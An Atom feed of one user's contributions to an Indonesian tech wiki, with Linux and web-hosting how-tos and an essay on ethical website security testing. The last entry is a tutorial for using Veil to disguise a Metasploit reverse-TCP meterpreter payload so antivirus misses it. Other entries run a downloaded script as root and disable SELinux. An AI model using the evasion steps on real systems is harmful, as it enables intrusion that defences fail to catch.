<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://lms.onnocenter.or.id/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Adinugroho</id>
	<title>OnnoCenterWiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://lms.onnocenter.or.id/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Adinugroho"/>
	<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Special:Contributions/Adinugroho"/>
	<updated>2026-04-20T00:59:08Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Cara_Mengecek_Versi_CentOS&amp;diff=40441</id>
		<title>Cara Mengecek Versi CentOS</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Cara_Mengecek_Versi_CentOS&amp;diff=40441"/>
		<updated>2014-05-11T07:14:47Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: Cara mengecek versi CentOS itu mudah. Salah satunya dengan perintah di bawah ini  # cat /etc/*release*  Outputnya seperti ini  CentOS release 6.5 (Final)  CentOS release 6.5 (Final)  CentO...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Cara mengecek versi CentOS itu mudah. Salah satunya dengan perintah di bawah ini&lt;br /&gt;
 # cat /etc/*release*&lt;br /&gt;
&lt;br /&gt;
Outputnya seperti ini&lt;br /&gt;
 CentOS release 6.5 (Final)&lt;br /&gt;
 CentOS release 6.5 (Final)&lt;br /&gt;
 CentOS release 6.5 (Final)&lt;br /&gt;
 cpe:/o:centos:linux:6:GA&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Update_Semua_WordPress_di_Server&amp;diff=40440</id>
		<title>Update Semua WordPress di Server</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Update_Semua_WordPress_di_Server&amp;diff=40440"/>
		<updated>2014-05-11T07:14:16Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: Sumber: http://adinugroho.web.id/update-semua-wordpress-di-server/  Assalamualaikum, Dari dulu saya nyari bash script buat update semua WordPress core, themes dan plugins pada sebuah serve...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sumber: http://adinugroho.web.id/update-semua-wordpress-di-server/&lt;br /&gt;
&lt;br /&gt;
Assalamualaikum,&lt;br /&gt;
Dari dulu saya nyari bash script buat update semua WordPress core, themes dan plugins pada sebuah server tapi kebanyakan sudah tidak valid. Tetapi semua itu berubah sejak negara api menyerang :D. Sekarang saya sudah menemukan script yang valid di blognya remuhosting&lt;br /&gt;
&lt;br /&gt;
Jalankan perintah di bawah ini dengan user root anda.&lt;br /&gt;
 wget http://b.ri.mu/files/wordpress-upgrade.sh&lt;br /&gt;
 chmod +x wordpress-upgrade.sh&lt;br /&gt;
 yes|./wordpress-upgrade.sh&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Membuat_git_Repository_Untuk_Website&amp;diff=40439</id>
		<title>Membuat git Repository Untuk Website</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Membuat_git_Repository_Untuk_Website&amp;diff=40439"/>
		<updated>2014-05-11T07:12:27Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: Di komputer kita  $ mkdir website &amp;amp;&amp;amp; cd website  $ git init  Initialized empty Git repository in /home/ams/website/.git/  $ echo &amp;#039;Hello, world!&amp;#039; &amp;gt; index.html  $ git add index.html  $ git c...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Di komputer kita&lt;br /&gt;
 $ mkdir website &amp;amp;&amp;amp; cd website&lt;br /&gt;
 $ git init&lt;br /&gt;
 Initialized empty Git repository in /home/ams/website/.git/&lt;br /&gt;
 $ echo &#039;Hello, world!&#039; &amp;gt; index.html&lt;br /&gt;
 $ git add index.html&lt;br /&gt;
 $ git commit -q -m &amp;quot;The humble beginnings of my web site.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Di server&lt;br /&gt;
 $ mkdir website.git &amp;amp;&amp;amp; cd website.git&lt;br /&gt;
 $ git init --bare&lt;br /&gt;
 Initialized empty Git repository in /home/ams/website.git/&lt;br /&gt;
  &lt;br /&gt;
 $ mkdir /var/www/www.example.org&lt;br /&gt;
 $ cat &amp;gt; hooks/post-receive&lt;br /&gt;
 #!/bin/sh&lt;br /&gt;
 GIT_WORK_TREE=/var/www/www.example.org git checkout -f&lt;br /&gt;
 $ chmod +x hooks/post-receive&lt;br /&gt;
&lt;br /&gt;
Balik lagi ke komputer lokal.&lt;br /&gt;
 $ git remote add web ssh://server.example.org/home/ams/website.git&lt;br /&gt;
 $ git push web +master:refs/heads/master&lt;br /&gt;
&lt;br /&gt;
Test ngepush&lt;br /&gt;
 $ git push web&lt;br /&gt;
&lt;br /&gt;
==referensi==&lt;br /&gt;
* http://toroid.org/ams/git-website-howto&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38882</id>
		<title>Instalasi Kloxo</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38882"/>
		<updated>2013-12-10T00:03:38Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Kebutuhan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Kloxo adalah sistem manajemen hosting berbasis opensource. Tampilannya mirip dengan [[cPanel]] dan mempunyai fitur yang lebih lengkap daripada [[webmin]]&lt;br /&gt;
&lt;br /&gt;
==Kebutuhan==&lt;br /&gt;
1) Dedicated atau virtual server menggunakan CentOS atau Red Hat EL 5.x. Sedangkan CentOS 6.x belum bisa diinstal Kloxo.&lt;br /&gt;
&lt;br /&gt;
2) Minimal 256 MB RAM (cukup untuk menjalankan Yum).&lt;br /&gt;
&lt;br /&gt;
3) Minimal ruang harddisk kosong sebesar 2 GB.&lt;br /&gt;
&lt;br /&gt;
4) Jika kamu membuat partisi secara manual, pastikan kamu mempunyai ruang kosong di /tmp. Kloxo menggunakan /tmp untuk membuat dan menyimpan backup sementara dan proses akan gagal jika ruang penyimpanan tidak cukup.&lt;br /&gt;
&lt;br /&gt;
==Sebelum mulai==&lt;br /&gt;
&lt;br /&gt;
Anda harus mematikan SELinux dengan mengedit /etc/sysconfig/selinux dan mengganti barisnya menjadi selinux=disabled. &lt;br /&gt;
&lt;br /&gt;
Untuk memastikan SELinux tidak bekerja:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # setenforce 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda tidak yakin prosedur ini bekerja, anda bisa menjalankan /usr/sbin/sestatus. Jika anda gagal mematikan SELinux maka Kloxo yang anda install akan sia-sia.&lt;br /&gt;
Pastikan juga port 7778/tcp dan 7777/tcp terbuka di server firewall anda atau anda tidak akan bisa membuka web panel KLoxo setelah instalasi selesai.&lt;br /&gt;
&lt;br /&gt;
==Installing Kloxo==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda belum menginstal MySQL server di server anda, anda harus menginstal kloxo dengan cara di bawah ini:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Untuk menginstal sebagai Master (Default Single Server):&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=master&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Untuk menginstal sebagai Slave:&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=slave&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda sudah menginstal MySQL server maka anda harus menggunakan cara di bawah ini untuk instalasi Kloxo:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=&amp;lt;master/slave&amp;gt; --db-rootpassword=PASSWORD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Setelah Kloxo terinstal, silahkan buka &#039;&#039;&#039;http://YOUR_SERVER_IP:7778&#039;&#039;&#039; untuk mengakses halaman loginnya. Username awal adalah &#039;admin&#039; dan password awal adalah &#039;admin&#039;. Silahkan ubah passwordnya setelah login untuk meningkatkan keamanan.&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://wiki.lxcenter.org/Kloxo+Installation+Guide&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38881</id>
		<title>Instalasi Kloxo</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38881"/>
		<updated>2013-12-10T00:02:16Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Installing Kloxo */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Kloxo adalah sistem manajemen hosting berbasis opensource. Tampilannya mirip dengan [[cPanel]] dan mempunyai fitur yang lebih lengkap daripada [[webmin]]&lt;br /&gt;
&lt;br /&gt;
==Kebutuhan==&lt;br /&gt;
1) A dedicated or virtual server running CentOS or Red Hat EL 5.x. CentOS 6.x is not currently supported.&lt;br /&gt;
&lt;br /&gt;
2) Minimal 256 MB RAM (cukup untuk menjalankan Yum).&lt;br /&gt;
&lt;br /&gt;
3) Minimal ruang harddisk kosong sebesar 2 GB.&lt;br /&gt;
&lt;br /&gt;
4) Jika kamu membuat partisi secara manual, pastikan kamu mempunyai ruang kosong di /tmp. Kloxo menggunakan /tmp untuk membuat dan menyimpan backup sementara dan proses akan gagal jika ruang penyimpanan tidak cukup.&lt;br /&gt;
&lt;br /&gt;
==Sebelum mulai==&lt;br /&gt;
&lt;br /&gt;
Anda harus mematikan SELinux dengan mengedit /etc/sysconfig/selinux dan mengganti barisnya menjadi selinux=disabled. &lt;br /&gt;
&lt;br /&gt;
Untuk memastikan SELinux tidak bekerja:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # setenforce 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda tidak yakin prosedur ini bekerja, anda bisa menjalankan /usr/sbin/sestatus. Jika anda gagal mematikan SELinux maka Kloxo yang anda install akan sia-sia.&lt;br /&gt;
Pastikan juga port 7778/tcp dan 7777/tcp terbuka di server firewall anda atau anda tidak akan bisa membuka web panel KLoxo setelah instalasi selesai.&lt;br /&gt;
&lt;br /&gt;
==Installing Kloxo==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda belum menginstal MySQL server di server anda, anda harus menginstal kloxo dengan cara di bawah ini:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Untuk menginstal sebagai Master (Default Single Server):&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=master&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Untuk menginstal sebagai Slave:&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=slave&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda sudah menginstal MySQL server maka anda harus menggunakan cara di bawah ini untuk instalasi Kloxo:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=&amp;lt;master/slave&amp;gt; --db-rootpassword=PASSWORD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Setelah Kloxo terinstal, silahkan buka &#039;&#039;&#039;http://YOUR_SERVER_IP:7778&#039;&#039;&#039; untuk mengakses halaman loginnya. Username awal adalah &#039;admin&#039; dan password awal adalah &#039;admin&#039;. Silahkan ubah passwordnya setelah login untuk meningkatkan keamanan.&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://wiki.lxcenter.org/Kloxo+Installation+Guide&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38880</id>
		<title>Instalasi Kloxo</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38880"/>
		<updated>2013-12-09T13:29:57Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Referensi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Kloxo adalah sistem manajemen hosting berbasis opensource. Tampilannya mirip dengan [[cPanel]] dan mempunyai fitur yang lebih lengkap daripada [[webmin]]&lt;br /&gt;
&lt;br /&gt;
==Kebutuhan==&lt;br /&gt;
1) A dedicated or virtual server running CentOS or Red Hat EL 5.x. CentOS 6.x is not currently supported.&lt;br /&gt;
&lt;br /&gt;
2) Minimal 256 MB RAM (cukup untuk menjalankan Yum).&lt;br /&gt;
&lt;br /&gt;
3) Minimal ruang harddisk kosong sebesar 2 GB.&lt;br /&gt;
&lt;br /&gt;
4) Jika kamu membuat partisi secara manual, pastikan kamu mempunyai ruang kosong di /tmp. Kloxo menggunakan /tmp untuk membuat dan menyimpan backup sementara dan proses akan gagal jika ruang penyimpanan tidak cukup.&lt;br /&gt;
&lt;br /&gt;
==Sebelum mulai==&lt;br /&gt;
&lt;br /&gt;
Anda harus mematikan SELinux dengan mengedit /etc/sysconfig/selinux dan mengganti barisnya menjadi selinux=disabled. &lt;br /&gt;
&lt;br /&gt;
Untuk memastikan SELinux tidak bekerja:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # setenforce 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda tidak yakin prosedur ini bekerja, anda bisa menjalankan /usr/sbin/sestatus. Jika anda gagal mematikan SELinux maka Kloxo yang anda install akan sia-sia.&lt;br /&gt;
Pastikan juga port 7778/tcp dan 7777/tcp terbuka di server firewall anda atau anda tidak akan bisa membuka web panel KLoxo setelah instalasi selesai.&lt;br /&gt;
&lt;br /&gt;
==Installing Kloxo==&lt;br /&gt;
&lt;br /&gt;
Kloxo installation consists of downloading kloxo-installer.sh from download.lxcenter.org and executing it as root. The script will present you with a few questions and sometimes ask for a password (enter your root password).&lt;br /&gt;
&lt;br /&gt;
If you don&#039;t have MySQL server already installed, you must run:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To install as Master (Default Single Server):&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=master&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To install as Slave:&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=slave&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you already have MySQL installed and set a root password, you must run:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=&amp;lt;master/slave&amp;gt; --db-rootpassword=PASSWORD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once kloxo is installed, you can connect to http://YOUR_SERVER_IP:7778 and you will be presented with a login screen. Login as admin with password admin and once you are in, Kloxo will ask you to change the default password to a secure one.&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://wiki.lxcenter.org/Kloxo+Installation+Guide&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38879</id>
		<title>Instalasi Kloxo</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_Kloxo&amp;diff=38879"/>
		<updated>2013-12-09T13:29:27Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: Kloxo adalah sistem manajemen hosting berbasis opensource. Tampilannya mirip dengan cPanel dan mempunyai fitur yang lebih lengkap daripada webmin  ==Kebutuhan== 1) A dedicated or v...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Kloxo adalah sistem manajemen hosting berbasis opensource. Tampilannya mirip dengan [[cPanel]] dan mempunyai fitur yang lebih lengkap daripada [[webmin]]&lt;br /&gt;
&lt;br /&gt;
==Kebutuhan==&lt;br /&gt;
1) A dedicated or virtual server running CentOS or Red Hat EL 5.x. CentOS 6.x is not currently supported.&lt;br /&gt;
&lt;br /&gt;
2) Minimal 256 MB RAM (cukup untuk menjalankan Yum).&lt;br /&gt;
&lt;br /&gt;
3) Minimal ruang harddisk kosong sebesar 2 GB.&lt;br /&gt;
&lt;br /&gt;
4) Jika kamu membuat partisi secara manual, pastikan kamu mempunyai ruang kosong di /tmp. Kloxo menggunakan /tmp untuk membuat dan menyimpan backup sementara dan proses akan gagal jika ruang penyimpanan tidak cukup.&lt;br /&gt;
&lt;br /&gt;
==Sebelum mulai==&lt;br /&gt;
&lt;br /&gt;
Anda harus mematikan SELinux dengan mengedit /etc/sysconfig/selinux dan mengganti barisnya menjadi selinux=disabled. &lt;br /&gt;
&lt;br /&gt;
Untuk memastikan SELinux tidak bekerja:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # setenforce 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika anda tidak yakin prosedur ini bekerja, anda bisa menjalankan /usr/sbin/sestatus. Jika anda gagal mematikan SELinux maka Kloxo yang anda install akan sia-sia.&lt;br /&gt;
Pastikan juga port 7778/tcp dan 7777/tcp terbuka di server firewall anda atau anda tidak akan bisa membuka web panel KLoxo setelah instalasi selesai.&lt;br /&gt;
&lt;br /&gt;
==Installing Kloxo==&lt;br /&gt;
&lt;br /&gt;
Kloxo installation consists of downloading kloxo-installer.sh from download.lxcenter.org and executing it as root. The script will present you with a few questions and sometimes ask for a password (enter your root password).&lt;br /&gt;
&lt;br /&gt;
If you don&#039;t have MySQL server already installed, you must run:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To install as Master (Default Single Server):&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=master&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To install as Slave:&lt;br /&gt;
&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=slave&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you already have MySQL installed and set a root password, you must run:&lt;br /&gt;
&lt;br /&gt;
 # su - root&lt;br /&gt;
 # yum install -y wget&lt;br /&gt;
 # wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh&lt;br /&gt;
 # sh ./kloxo-installer.sh --type=&amp;lt;master/slave&amp;gt; --db-rootpassword=PASSWORD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once kloxo is installed, you can connect to http://YOUR_SERVER_IP:7778 and you will be presented with a login screen. Login as admin with password admin and once you are in, Kloxo will ask you to change the default password to a secure one.&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* [[http://wiki.lxcenter.org/Kloxo+Installation+Guide]]&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Mari_Hacking_Website_agar_menjadi_lebih_aman&amp;diff=38878</id>
		<title>Mari Hacking Website agar menjadi lebih aman</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Mari_Hacking_Website_agar_menjadi_lebih_aman&amp;diff=38878"/>
		<updated>2013-12-08T04:49:42Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sumber: http://adinugroho.web.id/mari-hacking-website-agar-menjadi-lebih-aman/&lt;br /&gt;
&lt;br /&gt;
Assalamualaikum,&lt;br /&gt;
&lt;br /&gt;
Sebenarnya ini bisa dikatakan curhat tetapi semoga bisa dibuat bahan renungan teman-teman juga.&lt;br /&gt;
Saya mengelola beberapa website yang saya gunakan untuk mendapatkan penghasilan dari iklan, artikel review, jualan barang dan sebagainya. Beberapa kali website saya disusupi oleh orang lain. Kadang merubah tampilan websitenya, memampang nicknamenya di sana, kadang menyisipkan beberapa halaman di folder tertentu yang mirip dengan login paypal, halaman login visa dan sebagainya yang biasa digunakan untuk phising. Ada yang masang script ddos, script bot, psybnc dll. Dari artikel yang pernah saya baca, lamer (level terendah dalam strata hacker yang kerjanya merusak sistem) sering merubah halaman website orang lain untuk sekedar memampang nicknamenya di sana, sekedar mencari kepuasan, agar dikenal oleh teman-teman komunitasnya. Ada juga yang disebut dengan hacktivism, merubah halaman situs orang lain dan dijadikan tempat untuk menyerukan aspirasinya. Seperti saat ini yang sedang hangat-hangatnya yaitu tentang malaysia dan free abb. Lucunya yang digunakan untuk memajang aspirasinya adalah di website yang sama sekali tidak ada hubungannya sama sekali.&lt;br /&gt;
&lt;br /&gt;
==Memangnya dampaknya apa sih?==&lt;br /&gt;
&lt;br /&gt;
Pernahkah kalian tahu apa yang terjadi dengan pemilik atau pengelola website tersebut?&lt;br /&gt;
Okay, secara pribadi dulu, apa yang terjadi dengan saya saat halaman website saya dirubah. Hanya karena halaman website berubah antara 1-4 hari, saya kehilangan setengah dari jumlah pengunjung website dan butuh waktu beberapa bulan agar website stabil kembali. Otomatis pendapatan saya berkurang. Pernah juga saya dikirimi email oleh paypal yang menyatakan bahwa website saya dilaporkan ke FBI karena ada halaman fake login paypal yang nangkring di website kesayangan saya. Padahal itu ulang orang yang menyusup dan memanfaatkan website saya untuk kepentingan pribadinya. Alhamdulillah saya belum mempunyai tanggungan anak istri jadi tidak terlalu bingung karena pendapatan bulanan sedikit meredam.&lt;br /&gt;
&lt;br /&gt;
Tetapi apa yang terjadi pada orang lain mungkin berbeda. Seperti teman saya yang sudah mempunyai anak istri dan menjadikan website yang dijadikan sebagai toko onlinenya sebagai salah satu ladang utama untuk mencari nafkah menghidupi anak istri. Kasihan kan? Hanya karena ingin menunjukkan kalau dia bisa masuk ke sistem orang lain dengan ilegal dia secara tidak langsung membuat usaha orang lain menjadi menurun. Memang rizki itu sudah diatur tetapi apakah pantas kita berbuat seperti itu?&lt;br /&gt;
&lt;br /&gt;
==lalu?==&lt;br /&gt;
&lt;br /&gt;
Lalu? Ilmu keamanan komputer atau keamanan website memang dibutuhkan. Jadi jika teman-teman memang berminat ke arah situ silahkan belajar dengan tekun. Banyak yang butuh orang-orang yang bisa mendeteksi kelemahan di sebuah website. Teman-teman malah bisa mendapatkan pekerjaan jika dilakukan dengan etika yang benar. Banyak yang pekerjaannya hanya mencari kelemahan sebuah website dan dia dibayar untuk itu, bayarannya lumayan besar dan legal yang berarti halal.&lt;br /&gt;
Jika butuh media untuk praktek lebih baik gunakan website sendiri atau gunakan komputer sendiri, diinstall webserver dan CMS. Atau jika memang ingin praktek langsung ke website milik orang lain silahkan minta izin terlebih dahulu. Siapa tau jika nanti memang menemukan lubang keamanan dan teman-teman bisa menutup lubang tersebut nanti yang punya website memberikan sedikit ucapan “terima kasih” yang masuk ke rekening teman-teman atau malah nanti disuruh bekerja di sana. Ada juga yang seperti itu dan itu terjadi kepada teman saya. Setelah menemukan lubang dan memperbaiki akhirnya ditawari untuk bekerja di perusahaan.&lt;br /&gt;
&lt;br /&gt;
==saya melakukannya untuk memberikan peringatan kok==&lt;br /&gt;
&lt;br /&gt;
Ibaratkan saja sebuah rumah. Apakah kita pantas nyelonong masuk tanpa permisi, merubah bahkan mengambil barang-barang di dalamnya lalu menempel pesan di dinding “mas, rumah anda tidak aman, tolong diamankan ya”. Seperti itu? Atau kita lihat dulu dari luar, “Ah, sepertinya maling bisa masuk dari jendela nih” lalu dia menemui pemilik rumah, memberi tahu kalau maling mungkin saja masuk dari jendela rumah dan memberikan masukan agar jendelanya diganti dengan yang lebih aman”. Misalkan saja seperti itu. Mana yang lebih baik?&lt;br /&gt;
Maka berikan peringatan dengan cara yang baik. Tidak perlu kita merubah halaman website untuk memperingatkan admin bahwa websitenya tidak aman. Silahkan kirim email, pakailah kata-kata yang sopan, tunjukkan dimana lubangnya. Terlebih lagi jika memang bisa tunjukkan bagaimana cara menutup lubangnya. Belum tentu admin yang mengelola website itu mengerti dengan hal-hal seperti itu, belum tentu juga dia admin yang malas. Bisa saja adminnya adalah orang dengan kemampuan IT yang terbatas makanya perlu diajari.&lt;br /&gt;
&lt;br /&gt;
Semoga apa yang saya tulis ini bisa dijadikan sedikit renungan. Berpikirlah terlebih dahulu sebelum melakukan sesuatu. Mohon maaf, ini hanyalah celotehan seorang blogger biasa yang masih butuh banyak belajar. Jika ada perbedaan pendapat itu wajar dan pasti :)&lt;br /&gt;
&lt;br /&gt;
Wassalamualaikum&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://adinugroho.web.id/mari-hacking-website-agar-menjadi-lebih-aman/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Keamanan Jaringan]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Network Security]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38877</id>
		<title>ByPass Antivirus Dengan Veil</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38877"/>
		<updated>2013-12-08T04:45:49Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Pranala Menarik */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==ByPass Antivirus Dengan Veil==&lt;br /&gt;
===Pendahuluan===&lt;br /&gt;
Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.&lt;br /&gt;
&lt;br /&gt;
===Instalasi Veil===&lt;br /&gt;
    wget https://github.com/ChrisTruncer/Veil/archive/master.zip&lt;br /&gt;
    unzip master.zip&lt;br /&gt;
    cd Veil-master/setup&lt;br /&gt;
    cd ..&lt;br /&gt;
    ./setup.sh&lt;br /&gt;
&lt;br /&gt;
===Penggunaan===&lt;br /&gt;
Setelah instalasi, jalankan veilnya&lt;br /&gt;
 ./Veil&lt;br /&gt;
	&lt;br /&gt;
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah &amp;quot;use&amp;quot;&lt;br /&gt;
 use&lt;br /&gt;
&lt;br /&gt;
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18&lt;br /&gt;
 18&lt;br /&gt;
	&lt;br /&gt;
Selanjutnya kita ketik perintah &amp;quot;generate&amp;quot; untuk menggenerate payloadnya&lt;br /&gt;
 generate&lt;br /&gt;
	&lt;br /&gt;
Setelah itu kita pilih msfvenom dengan mengetik angka &amp;quot;1&amp;quot;&lt;br /&gt;
 1&lt;br /&gt;
&lt;br /&gt;
Lalu kita berikan detail payloadnya misal&lt;br /&gt;
 Enter metasploit payload: “windows/meterpreter/reverse_tcp“&lt;br /&gt;
 Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111&amp;quot;&lt;br /&gt;
 Enter value for ‘LPORT’: “443“&lt;br /&gt;
	&lt;br /&gt;
Setelah payload digenerate kita beri nama payloadnya misalkan &amp;quot;bypass&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik &amp;quot;1&amp;quot;&lt;br /&gt;
&lt;br /&gt;
